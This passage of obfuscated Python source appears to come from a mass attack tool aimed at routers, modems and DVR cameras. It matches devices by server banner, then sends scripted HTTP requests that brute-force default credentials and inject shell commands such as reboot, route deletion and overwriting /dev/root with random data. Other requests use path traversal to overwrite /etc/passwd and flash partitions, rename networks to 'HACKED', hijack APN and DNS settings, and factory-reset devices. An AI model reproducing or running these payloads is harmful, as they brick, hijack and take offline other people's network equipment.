'POST /user.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=sys-log.html&SLEEP=1&SERVICE=sysklogd&SYSLOGD_LOG_ENABLE=1&SYSLOGD_REMOTE_LOG=1&LOG_ENABLE=on&SYSLOGD_LOG_LEVEL=7&REMOTE_LOG=on&SYSLOGD_REMOTE_HOST=%60reboot%60&SYSLOGD_REMOTE_PORT=514' ,
6628
'POST /wmx_auth.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=wmx-profile.html&SLEEP=1&WMX_AUTH_MODE=0' ,
6629
'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%' ,
6630
'GET /index.html?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' ,
6631
'POST /reboot.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%' ,
6632
'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6633
 ] ,
6634
[ 'mediatekrpc' , '302 Found.*Server: httpd.*Location: login\.asp' ,
6635
 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=admin&PASSWORD=admin&REDIRECT=index.asp&REDIRECT_ERR=login.asp' ,
6636
 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=user&PASSWORD=user&REDIRECT=index.asp&REDIRECT_ERR=login.asp' ,
6637
 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=guest&PASSWORD=guest&REDIRECT=index.asp&REDIRECT_ERR=login.asp' ,
6638
'GET /index.asp?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' ,
6639
'POST /rpc.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nCOUNT=9&WWW_SID=%%CUSTOM1%%&ACTION_1=sncfgSet&NAME_1=DHCPD_ENABLE&VALUE_1=0&ACTION_2=sncfgSet&NAME_2=DHCPD_START_IP&VALUE_2=192.168.0.100&ACTION_3=sncfgSet&NAME_3=DHCPD_END_IP&VALUE_3=192.168.0.199&ACTION_4=sncfgSet&NAME_4=DHCPD_LEASE_TIME&VALUE_4=1440&ACTION_5=sncfgSet&NAME_5=DHCPD_RELAY_IP&VALUE_5=0.0.0.0&ACTION_6=sncfgSet&NAME_6=DHCPD_METRIC&VALUE_6=30&ACTION_7=service&NAME_7=dhcpd&VALUE_7=reload&ACTION_8=service&NAME_8=lan&VALUE_8=reload&ACTION_9=service&NAME_9=wifi&VALUE_9=reload' ,
6640
'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%&REDIRECT=index.asp&REDIRECT_ERR=login.asp' ,
6641
'GET /index.asp?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' ,
6642
'POST /rpc.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nCOUNT=25&WWW_SID=%%CUSTOM1%%&ACTION_1=sncfgSet&NAME_1=WLAN_Channel&VALUE_1=6&ACTION_2=sncfgSet&NAME_2=WLAN_WirelessMode&VALUE_2=9&ACTION_3=sncfgSet&NAME_3=WLAN_TXPOWER_NOR&VALUE_3=10&ACTION_4=sncfgSet&NAME_4=WLAN_BeaconPeriod&VALUE_4=100&ACTION_5=sncfgSet&NAME_5=WLAN_DtimPeriod&VALUE_5=1&ACTION_6=sncfgSet&NAME_6=WLAN_SSID1&VALUE_6=HACKED&ACTION_7=sncfgSet&NAME_7=ManualSetSSID&VALUE_7=1&ACTION_8=sncfgSet&NAME_8=WLAN_EncrypType&VALUE_8=AES%3B&ACTION_9=sncfgSet&NAME_9=WLAN_AuthMode&VALUE_9=WPA2PSK%3B&ACTION_10=sncfgSet&NAME_10=WLAN_HideSSID&VALUE_10=0%3B&ACTION_11=sncfgSet&NAME_11=WLAN_DefaultKeyID&VALUE_11=&ACTION_12=sncfgSet&NAME_12=WLAN_Key1Type&VALUE_12=&ACTION_13=sncfgSet&NAME_13=WLAN_Key2Type&VALUE_13=&ACTION_14=sncfgSet&NAME_14=WLAN_Key3Type&VALUE_14=&ACTION_15=sncfgSet&NAME_15=WLAN_Key4Type&VALUE_15=&ACTION_16=sncfgSet&NAME_16=WLAN_WAPIPassType&VALUE_16=1%3B&ACTION_17=sncfgSet&NAME_17=WLAN_WPAPSK1&VALUE_17=XnSKDUJjRL&ACTION_18=sncfgSet&NAME_18=WLAN_Key1Str1&VALUE_18=XnSKDUJjRL&ACTION_19=sncfgSet&NAME_19=WLAN_Key2Str1&VALUE_19=XnSKDUJjRL&ACTION_20=sncfgSet&NAME_20=WLAN_Key3Str1&VALUE_20=XnSKDUJjRL&ACTION_21=sncfgSet&NAME_21=WLAN_Key4Str1&VALUE_21=XnSKDUJjRL&ACTION_22=sncfgSet&NAME_22=WLAN_WAPIPassword1&VALUE_22=XnSKDUJjRL&ACTION_23=sncfgSet&NAME_23=WLAN_HT_BW&VALUE_23=0&ACTION_24=sncfgSet&NAME_24=WLAN_SecondChannel&VALUE_24=0&ACTION_25=service&NAME_25=wifi&VALUE_25=switch' ,
6643
'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%&REDIRECT=index.asp&REDIRECT_ERR=login.asp' ,
6644
'GET /index.asp?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' ,
6645
'POST /rpc.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nCOUNT=6&WWW_SID=%%CUSTOM1%%&ACTION_1=sncfgSet&NAME_1=LAN_IP&VALUE_1=10.%%RAND8%%&ACTION_2=sncfgSet&NAME_2=LAN_MASK&VALUE_2=255.255.255.0&ACTION_3=service&NAME_3=lan&VALUE_3=reload&ACTION_4=sncfgSet&NAME_4=DNSPROXY_DEVICE_NAME&VALUE_4=hacked.modem&ACTION_5=service&NAME_5=totd&VALUE_5=reload&ACTION_6=service&NAME_6=wifi&VALUE_6=reload' ,
6646
'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%&REDIRECT=index.asp&REDIRECT_ERR=login.asp' ,
6647
'GET /index.asp?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' ,
6648
'POST /rpc.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nCOUNT=4&WWW_SID=%%CUSTOM1%%&ACTION_1=sncfgSet&NAME_1=DHCPD_NTP&VALUE_1=2%2C%60route%20del%20default%60+0%2C0.0.0.0+0%2C0.0.0.0&ACTION_2=service&NAME_2=dhcpd&VALUE_2=reload&ACTION_3=service&NAME_3=lan&VALUE_3=reload&ACTION_4=service&NAME_4=wifi&VALUE_4=reload' ,
6649
'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%&REDIRECT=index.asp&REDIRECT_ERR=login.asp' ,
6650
'GET /index.asp?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' ,
6651
'POST /rpc.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nCOUNT=3&WWW_SID=%%CUSTOM1%%&ACTION_1=sncfgSet&NAME_1=DNSPROXY_DEVICE_NAME&VALUE_1=%60route%20del%20default%60&ACTION_2=service&NAME_2=totd&VALUE_2=reload&ACTION_3=service&NAME_3=wifi&VALUE_3=reload' ,
6652
'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%&REDIRECT=index.asp&REDIRECT_ERR=login.asp' ,
6653
'GET /index.asp?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' ,
6654
'POST /rpc.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nCOUNT=3&WWW_SID=%%CUSTOM1%%&ACTION_1=sncfgSet&NAME_1=DNSPROXY_DEVICE_NAME&VALUE_1=%60reboot%60&ACTION_2=service&NAME_2=totd&VALUE_2=reload&ACTION_3=service&NAME_3=wifi&VALUE_3=reload' ,
6655
 'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6656
 ] ,
6657
 [ 'mdmweb' , 'Server: lighttpd.*xmlns=.*;<title></title>;.*href=include/style.css' ,
6658
 'POST /cgi-bin/qcmap_auth HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: %%BODYLENGTH%%\r\n\r\ntype=login&pwd=21232f297a57a5a743894a0e4a801fc3&timeout=300&user=admin' ,
6659
 'POST /cgi-bin/qcmap_auth HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: %%BODYLENGTH%%\r\n\r\ntype=login&pwd=admin&timeout=300&user=admin' ,
6660
'POST /cgi-bin/qcmap_web_cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nPage=SetMobileAP&mask=2&autoconnect=0&autoconnect_result=0&roaming=0&roaming_result=0&token=%%CUSTOM1%%' ,
6661
 'POST /cgi-bin/qcmap_web_cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nPage=ModifyProfile&mask=0&type=1&index=0&name=EVO&apn=default.hacked&username=default.hacked&password=default.hacked&auth_protocol=0&pdn_type=1&rat_type=3&pdn_level_user=&pdn_level_password=&pdn_level_label=&pdn_level_auth_type=0&token=%%CUSTOM1%%' ,
6662
 'POST /cgi-bin/qcmap_web_cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nPage=SetWLANConfig&mask=0&wifi_enable=0&wifi_ssid=DEFAULT_PW&wifi_hide=0&wifi_band=1&wifi_mode=2&wifi_channel=0&wifi_max_clients=10&wifi_EncrypType=3&wifi_AuthMode=1&wifi_wep_default_key=&wifi_wep_key_len=&wifi_Key1Type=&wifi_Key1Str1=&wifi_Key2Type=&wifi_Key2Str1=&wifi_Key3Type=&wifi_Key3Str1=&wifi_Key4Type=&wifi_Key4Str1=&wifi_wpa_password=%%RAND8%%&wifi_wapi_key_type=0&wifi_wapi_key=&wifi_HT_BW=0&wifi_SecondChannel=1&wifi_beaconPeriod=20&wifi_dtimPeriod=1&token=%%CUSTOM1%%' ,
6663
'POST /cgi-bin/qcmap_web_cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nPage=SetLanConfig&Mask=1&lan_gw_addrs=192.168.%%RAND16%%&lan_sub=255.255.255.254&lan_dhcp=1&lan_dhcp_start=192.168.%%COMP16%%&lan_dhcp_end=192.168.%%COMP16%%&lan_dhcp_lease=30&token=%%CUSTOM1%%' ,
6664
'POST /cgi-bin/qcmap_web_cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nPage=SetNetworkMode&mask=0&mode=2&token=%%CUSTOM1%%' ,
6665
 'GET / HTTP/1.0\r\n\r\n' ,
6666
 ] ,
6667
 [ 'airosfile' , 'Cookie: AIR' ,
6668
 'POST /login.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: multipart/form-data; boundary=XXX\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n--XXX\r\nContent-Disposition: form-data; name="passwd"; filename="../../etc/passwd"\r\n\r\ntest:D/jrO7OLO39l.:0:0:Administrator:/etc/persistent:/bin/sh\r\n--XXX--\r\n' ,
6669
 'POST /login.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: multipart/form-data; boundary=XXX\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n--XXX\r\nContent-Disposition: form-data; name="passwd"; filename="../../dev/mtdblock5"\r\n\r\nUBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI \r\n--XXX--\r\n' ,
6670
 'POST /login.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: multipart/form-data; boundary=XXX\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n--XXX\r\nContent-Disposition: form-data; name="passwd"; filename="../../dev/mtdblock4"\r\n\r\nUBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI \r\n--XXX--\r\n' ,
6671
 'POST /login.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: multipart/form-data; boundary=XXX\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n--XXX\r\nContent-Disposition: form-data; name="passwd"; filename="../../dev/mtdblock6"\r\n\r\nUBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI \r\n--XXX--\r\n' ,
6672
 'POST /login.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: multipart/form-data; boundary=XXX\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n--XXX\r\nContent-Disposition: form-data; name="passwd"; filename="../../dev/mem"\r\n\r\nUBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI NETWORKS UBRICKUITI \r\n--XXX--\r\n' ,
6673
 'GET / HTTP/1.0\r\n\r\n' ,
6674
 ] ,
6675
 [ 'xionghash' , 'Server: uc-httpd' ,
6676
 'GET ../../../../../mnt/mtd/Config/Account1 HTTP/1.0\r\n\r\n' ,
6677
 'xtsxpand:iris_small:1' ,
6678
 'xtsxpand:focus_near:1' ,
6679
 'xtsxpand:zoom_tile:1' ,
6680
 'xtsxpand:direction_down:1' ,
6681
 'xnrxpand:irissmall:1' ,
6682
 'xnrxpand:focusnear:1' ,
6683
 'xnrxpand:zoomtile:1' ,
6684
 'xnrxpand:directiondown:1' ,
6685
 'xtsxpand:iris_small:2' ,
6686
 'xtsxpand:focus_near:2' ,
6687
 'xtsxpand:zoom_tile:2' ,
6688
 'xtsxpand:direction_down:2' ,
6689
 'xnrxpand:irissmall:2' ,
6690
 'xnrxpand:focusnear:2' ,
6691
 'xnrxpand:zoomtile:2' ,
6692
 'xnrxpand:directiondown:2' ,
6693
 'xtsxpand:iris_small:3' ,
6694
 'xtsxpand:focus_near:3' ,
6695
 'xtsxpand:zoom_tile:3' ,
6696
 'xtsxpand:direction_down:3' ,
6697
 'xnrxpand:irissmall:3' ,
6698
 'xnrxpand:focusnear:3' ,
6699
 'xnrxpand:zoomtile:3' ,
6700
 'xnrxpand:directiondown:3' ,
6701
 'GET / HTTP/1.0\r\n\r\n' ,
6702
 ] ,
6703
[ 'hnap' , '(HTTP|HTML|html)' ,
6704
 'GET /HNAP1/ HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6705
'hnapxpand:admin/admin:SetWanSettings:SetWanSettings:<Type>Static</Type><IPAddress>10.%%RAND8%%</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.%%COMP8%%</Gateway>' ,
6706
 'hnapxpand:admin/1234:SetWanSettings:SetWanSettings:<Type>Static</Type><IPAddress>10.%%RAND8%%</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.%%COMP8%%</Gateway>' ,
6707
 'hnapxpand:admin/password:SetWanSettings:SetWanSettings:<Type>Static</Type><IPAddress>10.%%RAND8%%</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.%%COMP8%%</Gateway>' ,
6708
 'hnapxpand:admin/:SetWanSettings:SetWanSettings:<Type>Static</Type><IPAddress>10.%%RAND8%%</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.%%COMP8%%</Gateway>' ,
6709
 'hnapxpand:user/user:SetWanSettings:SetWanSettings:<Type>Static</Type><IPAddress>10.%%RAND8%%</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.%%COMP8%%</Gateway>' ,
6710
 'hnapxpand:user/1234:SetWanSettings:SetWanSettings:<Type>Static</Type><IPAddress>10.%%RAND8%%</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.%%COMP8%%</Gateway>' ,
6711
 'hnapxpand:user/:SetWanSettings:SetWanSettings:<Type>Static</Type><IPAddress>10.%%RAND8%%</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.%%COMP8%%</Gateway>' ,
6712
 'hnapxpand:cisco/cisco:SetWanSettings:SetWanSettings:<Type>Static</Type><IPAddress>10.%%RAND8%%</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.%%COMP8%%</Gateway>' ,
6713
 'hnapxpand:Cisco/Cisco:SetWanSettings:SetWanSettings:<Type>Static</Type><IPAddress>10.%%RAND8%%</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.%%COMP8%%</Gateway>' ,
6714
 'hnapxpand:cusadmin/password:SetWanSettings:SetWanSettings:<Type>Static</Type><IPAddress>10.%%RAND8%%</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.%%COMP8%%</Gateway>' ,
6715
'hnapxpand:admin/admin:GetDeviceSettings/`cat${IFS}/dev/urandom${IFS}>/dev/root`:GetDeviceSettings:' ,
6716
 'hnapxpand:admin/admin:GetDeviceSettings/SetWanSettings:SetWanSettings:<Type>Static</Type><IPAddress>10.%%RAND8%%</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.%%COMP8%%</Gateway>' ,
6717
 'hnapxpand:admin/admin:GetDeviceSettings:SetWanSettings:<Type>Static</Type><IPAddress>10.%%RAND8%%</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.%%COMP8%%</Gateway>' ,
6718
 'hnapxpand:admin/admin:GetDeviceSettings/`route${IFS}del${IFS}default`:GetDeviceSettings:' ,
6719
 'hnapxpand:admin/admin:GetDeviceSettings/SetFactoryDefault:SetFactoryDefault:' ,
6720
 'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6721
 ] ,
6722
 ]
6723
if 51 - 51: OOOoOooO / OOOoOooO
6724
if 42 - 42: o0oooooO % Oooo + Oo0
6725
O0O = "SPLTX"
6726
if 58 - 58: o0ooO / O0oo0OOOOO00 + O0oo / Ii11i1iIi - I11I1Ii
6727
if 17 - 17: i1
6728
time . sleep ( 1 )
6729
if 82 - 82: IIiIIiIii1I - I11I1Ii % IIiIii1iI % O0oo0OOOOO00 - Oo0Oo
6730
for OoOoOoo0OOo00 in range ( len ( o0O0oO ) ) :
6731
 for o00OOO in range ( len ( o0O0oO [ OoOoOoo0OOo00 ] ) ) :
6732
  Oo00oO0O = re . search ( 'hnapxpand:([^:/]*)/([^:]*):([^:]+):([^:]+):(.*)$' , o0O0oO [ OoOoOoo0OOo00 ] [ o00OOO ] )
6733
  if Oo00oO0O :
6734
   o0O0oO [ OoOoOoo0OOo00 ] [ o00OOO ] = 'POST /HNAP1/ HTTP/1.0\r\nAuthorization: Basic %s\r\nContent-Type: text/xml; charset="utf-8"\r\nSOAPAction: http://purenetworks.com/HNAP1/%s\r\nContent-Length: %%%%BODYLENGTH%%%%\r\n\r\n<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><soap:Body><%s xmlns="http://purenetworks.com/HNAP1/">%s</%s></soap:Body></soap:Envelope>' % ( binascii . b2a_base64 ( '%s:%s' % ( Oo00oO0O . group ( 1 ) , Oo00oO0O . group ( 2 ) ) ) . strip ( ) , Oo00oO0O . group ( 3 ) , Oo00oO0O . group ( 4 ) , Oo00oO0O . group ( 5 ) , Oo00oO0O . group ( 4 ) )
6735
  Oo00oO0O = re . search ( 'xtsxpand:([^:]+):(\d+)' , o0O0oO [ OoOoOoo0OOo00 ] [ o00OOO ] )
6736
  if Oo00oO0O :
6737
   o0O0oO [ OoOoOoo0OOo00 ] [ o00OOO ] = 'POST /dvrcmd HTTP/1.1\r\nHost: %%%%TARGETIP%%%%\r\nContent-Type: text/plain;charset=UTF-8\r\nContent-Length: %%%%BODYLENGTH%%%%\r\n\r\nTSCommand=ptz_req&req=start&param=%s&channel=%s&stream=1' % ( Oo00oO0O . group ( 1 ) , Oo00oO0O . group ( 2 ) )
6738
  Oo00oO0O = re . search ( 'xnrxpand:([^:]+):(\d+)' , o0O0oO [ OoOoOoo0OOo00 ] [ o00OOO ] )
6739
  if Oo00oO0O :
6740
   o0O0oO [ OoOoOoo0OOo00 ] [ o00OOO ] = 'POST /dvrcmd HTTP/1.1\r\nHost: %%%%TARGETIP%%%%\r\nContent-Type: text/plain;charset=UTF-8\r\nContent-Length: %%%%BODYLENGTH%%%%\r\n\r\ncommand=ptz_req&req=start&param=%s&channel=%s&stream=1' % ( Oo00oO0O . group ( 1 ) , Oo00oO0O . group ( 2 ) )
6741
time . sleep ( 1 )
6742
if 85 - 85: Oo0Oo - Oo0 * I11I1Ii . IIiII
6743
if 62 - 62: oOoO0Ooo / O0oo0OOOOO00 * OOooOO0 - o0ooO - OOOoOooO
6744
if 27 - 27: Oo0Oo * Ii11i1iIi
6745
i11IiiI1I = [ ]
6746
o0o0000OO = { }
6747
O0000o0 = { }
6748
O0Oooo0ooo0 = { }
6749
IIi1i1iiii1Ii = { }
6750
Ooo000Oo = { }
6751
IIiiI = { }
6752
if 27 - 27: Oo0 % I11I1Ii * o0ooO - Ii11i1iIi
6753
O000oo0 = [ ]
6754
O0oOoo = { }
6755
o0O00OO = { }
6756
OO0 = { }
6757
o0Oo00O0O0 = { }
6758
ooOoO0o = { }
6759
I1I1IIi1i1I = { }
6760
IiIi11iii = { }
6761
IIi1i = { }
6762
IIIiI = { }
6763
IiiI1II1111I1 = { }
6764
ooOo = { }
6765
iIiIi1II11 = { }
6766
Ii1ii = { }
6767
iIi1I1IiIiiIi = { }
6768
O0oOO = { }
6769
if 15 - 15: Ii % oOoO0Ooo + oOOo0000o - O0oo
6770
if 69 - 69: Oo0Oo + i1IIi1i1iiI . IIiII + o0oooooO
6771
def oOo0OOO0000 ( targetip , targetport , bannerhint , loginhint = '' , passwordhint = '' ) :
6772
 global o0O0oO
6773
 global OO00oo0o
6774
 if 31 - 31: Oo0Oo * I11I1Ii % oOOoO00oo0 + IIiIii1iI * IIiII
6775
 if not OO00oo0o :
6776
  return
6777
  if 52 - 52: Oo0Oo
6778
 O0000oO0O = ( targetip , int ( targetport ) )
6779
 I11i1I = hash ( O0000oO0O )
6780
 if I11i1I in O000oo0 :
6781
  if 66 - 66: Ii * o0oooooO + Ii11i1iIi - OOOoOooO * IIiIii1iI
6782
  return ;
6783
  if 40 - 40: o0ooO / i1 * i1 * Ii11i1iIi
6784
  if 28 - 28: O0oo0OOOOO00 - Oo0Oo * OOooOO0
6785
  if 83 - 83: oOoO0Ooo * IIiII / IIiII + i1
6786
 iii = ''
6787
 ooOOO0oo0Oo00 = [ ]
6788
 for I1I1iIIi11I in o0O0oO :
6789
  if re . search ( I1I1iIIi11I [ 1 ] , bannerhint ) :
6790
   if 82 - 82: Oooo % Oo0
6791
   iii = I1I1iIIi11I [ 0 ] ;
6792
   ooOOO0oo0Oo00 = I1I1iIIi11I [ 2 : ]
6793
   if 92 - 92: IIiII - Ii11i1iIi . oOOoO00oo0 . oOOo0000o
6794
   break
6795
   if 88 - 88: o0ooO * o0oooooO / Oooo
6796
 if not iii :
6797
  if 99 - 99: oOOoO00oo0 * i1 / IIiII * Ii / IIiIii1iI
6798
  return
6799
  if 34 - 34: Oo0 + Ii11i1iIi / oOOoO00oo0
6800
 ooOoO0o [ I11i1I ] = 0
6801
 I1I1IIi1i1I [ I11i1I ] = ooOOO0oo0Oo00
6802
 o0Oo00O0O0 [ I11i1I ] = iii
6803
 if 60 - 60: i1IIi1i1iiI / oOOoO00oo0 % Oo0
6804
 O0oOoo [ I11i1I ] = ( targetip , int ( targetport ) , bannerhint )
6805
 o0O00OO [ I11i1I ] = 0
6806
 OO0 [ I11i1I ] = None
6807
 IiIi11iii [ I11i1I ] = loginhint
6808
 IIi1i [ I11i1I ] = passwordhint
6809
 IIIiI [ I11i1I ] = ""
6810
 IiiI1II1111I1 [ I11i1I ] = ""
6811
 ooOo [ I11i1I ] = ""
6812
 iIiIi1II11 [ I11i1I ] = ""
6813
 Ii1ii [ I11i1I ] = ""
6814
 O0oOO [ I11i1I ] = 0
6815
 O000oo0 . append ( I11i1I )
6816
 if 41 - 41: i1 . oOoO0Ooo - IIiIii1iI . i1 / I11I1Ii / IIiII
6817
def oOoo0 ( targetip , targetport , request , jobhash ) :
6818
 O0000oO0O = ( targetip , int ( targetport ) )
6819
 if 81 - 81: oOOo0000o + OOooOO0 / OOooOO0 * Ii11i1iIi / IIiIIiIii1I - oOoO0Ooo
6820
 O0OOo00o00o = socket . socket ( socket . AF_INET , socket . SOCK_STREAM )
6821
 O0OOo00o00o . setblocking ( 0 )
6822
 if 46 - 46: Oo0Oo + Ii - i1 % IIiIIiIii1I
6823
 try :
6824
  O0OOo00o00o . connect ( O0000oO0O )
6825
 except :
6826
  pass
6827
  if 16 - 16: IIiIIiIii1I % O0oo0OOOOO00
6828
 I11i1I = hash ( O0OOo00o00o )
6829
